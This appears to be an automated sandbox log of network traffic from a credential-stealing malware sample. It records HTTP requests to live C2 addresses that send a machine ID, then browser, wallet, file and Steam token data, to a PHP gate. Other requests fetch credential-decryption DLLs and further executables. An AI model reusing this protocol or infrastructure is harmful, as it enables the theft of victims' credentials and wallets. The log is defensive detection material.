Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: /APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1731527066122Host: self.events.data.microsoft.comContent-Length: 7974Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 33 45 42 46 43 35 33 37 32 36 33 30 35 30 34 35 37 33 35 38 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 2d 2d 0d 0a Data Ascii: ------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="hwid"E83EBFC537263050457358------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="build"mars------IJJJEBFHDBGIECBFCBKJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHIHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 2d 2d 0d 0a Data Ascii: ------DGDHJEGIEBFHDGDGHDHIContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------DGDHJEGIEBFHDGDGHDHIContent-Disposition: form-data; name="message"browsers------DGDHJEGIEBFHDGDGHDHI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 2d 2d 0d 0a Data Ascii: ------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="message"plugins------FIJKEHJJDAAKFHIDAKFH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGCGCFHIEHIDGDBAAEHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 2d 2d 0d 0a Data Ascii: ------EGDGCGCFHIEHIDGDBAAEContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------EGDGCGCFHIEHIDGDBAAEContent-Disposition: form-data; name="message"fplugins------EGDGCGCFHIEHIDGDBAAE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFHost: 185.215.113.206Content-Length: 7763Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 2d 2d 0d 0a Data Ascii: ------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------BKFBAECBAEGDGDHIEHIJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="file"------CGHCFBAAAFHJDGCBFIIJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCBHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKECAKFBGCAKECGIEHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 2d 2d 0d 0a Data Ascii: ------GCBKECAKFBGCAKECGIEHContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------GCBKECAKFBGCAKECGIEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCBKECAKFBGCAKECGIEHContent-Disposition: form-data; name="file"------GCBKECAKFBGCAKECGIEH--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDAAFBKFHIEBFCFBKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 41 41 46 42 4b 46 48 49 45 42 46 43 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 41 41 46 42 4b 46 48 49 45 42 46 43 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 41 41 46 42 4b 46 48 49 45 42 46 43 46 42 4b 2d 2d 0d 0a Data Ascii: ------DAKJDAAFBKFHIEBFCFBKContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------DAKJDAAFBKFHIEBFCFBKContent-Disposition: form-data; name="message"wallets------DAKJDAAFBKFHIEBFCFBK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="message"files------CAKKEGDGCGDAKEBFIJEC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="file"------BAFCGIJDAFBKFIECBGCA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFHHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="message"ybncbhylepme------EBAAFCAFCBKFHJJJKKFH--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFBHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDBFBFCBFBKECAAKJKFB--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /img/mk.exe HTTP/1.1Host: 87.120.125.254
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 33 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006034001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006039001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006040001&unit=246122658369
